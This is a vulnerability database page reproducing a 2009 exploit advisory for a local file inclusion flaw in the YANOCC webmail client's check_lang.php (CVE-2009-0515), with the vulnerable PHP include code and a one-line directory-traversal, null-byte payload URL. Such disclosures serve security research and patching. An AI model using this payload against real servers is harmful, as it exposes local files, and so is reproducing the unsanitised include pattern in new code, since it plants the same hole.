Lucene search
+L

Yet Another NOCC 0.1.0 - Local File Inclusion

🗓️ 09 Feb 2009 00:00:00Reported by KacperType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

YANOCC 0.1.0 - Local File Inclusion Vulnerability in check_lang.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0515
9 Feb 200900:00
circl
cve
CVE
CVE-2009-0515
11 Feb 200900:00
cve
cvelist
Cvelist
CVE-2009-0515
11 Feb 200900:00
cvelist
euvd
EUVD
EUVD-2009-0519
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0515
11 Feb 200900:30
nvd
prion
Prion
Directory traversal
11 Feb 200900:30
prion
Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities

YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers.
YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support,
MIME attachments, displays HTML messages, address book, folder support.

Author: Kacper
HomePage: http://devilteam.pl/
          http://polskihacking.pl/

in file check_lang.php:

if (!ISSET($lang))
{
	$ar_lang = explode(",", $HTTP_ACCEPT_LANGUAGE);
	while ($accept_lang = array_shift($ar_lang))
	{
		$tmp = explode(";", $accept_lang);
		$tmp[0] = strtolower($tmp[0]);
		if (file_exists("lang/".$tmp[0].".php"))
		{
			$lang = $tmp[0];
			break;
		}
	}
	if ($lang == "")
		$lang = $default_lang;
}
//  Fix for faulty PHP install (RH7, see bug #24933)
$lang = trim($lang);
require ("lang/".$lang.".php");

Vuln example:

check_lang.php?lang=../[localinclude]%00


# milw0rm.com [2009-02-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Feb 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01979
36